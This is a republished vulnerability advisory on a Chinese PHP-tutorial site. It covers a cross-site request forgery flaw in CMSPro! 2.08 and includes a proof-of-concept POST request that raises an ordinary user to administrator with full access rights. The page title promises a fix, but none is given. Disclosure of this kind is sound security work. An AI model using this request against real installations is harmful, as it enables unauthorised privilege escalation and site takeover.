网站地图    收藏   

主页 > 后端 > 网站安全 >

CMSPro! 2.08 CSRF缺陷及修复 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 14:46 作者: 阅读:

[导读] CMSPro! 2.08 CSRF Vulnerability# Title : CMSPro! 2.08 Cross Site Request Forgery (CSRF) Vulnerability# Software : CMSPro!# Version : 2.08# Site : http://www.wojoscripts.com/c......

CMSPro! 2.08 CSRF Vulnerability
# Title : CMSPro! 2.08  Cross Site Request Forgery (CSRF) Vulnerability
# Software : CMSPro!
# Version :  2.08
# Site : http://www.wojoscripts.com/cmspro/ or
http://codecanyon.net/item/cms-pro-lightweight-content-management-system/140078
# Author : Xadpritox
# Email : xadpritox@whitehatmail.com
 
 
 
缺陷描述:
CMSPro! 2.08 versions contain a flaw that allows a remote Cross-site Request
Forgery (CSRF) attack. The flaw exists because the application does not
require multiple steps or explicit confirmation for sensitive transactions
for majority of administrator functions such as delete , assigning user to
administrative privilege. By using a crafted URL, an attacker may trick the
victim into visiting to his web page to take advantage of the trust
relationship between the authenticated victim and the application. Such an
attack could trick the victim into executing arbitrary commands in the
context of their session with the application, without further prompting or
verification.
 
 
受影响版本

CMSPro! 2.08
 
 
PROOF-OF-CONCEPT/EXPLOIT
The following request escalates a normal user to an administrator.
 
POST /cmspro/admin/controller.php password=&email=xadpritox%
www.2cto.com &fname=Xadpritox&lname=Xadpritox&membership_id=4&userlevel=9&access%5B%5D=
Menus&access%5B%5D=Pages&access%5B%5D=Posts&access%5B%5D=Modules&access%5B%5D=
Rss&access%5B%5D=Layout&access%5B%5D=Configuration&active=y&newsletter=0&submit=
Update+User&username=Xadpritox&userid=5&processUser=1

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论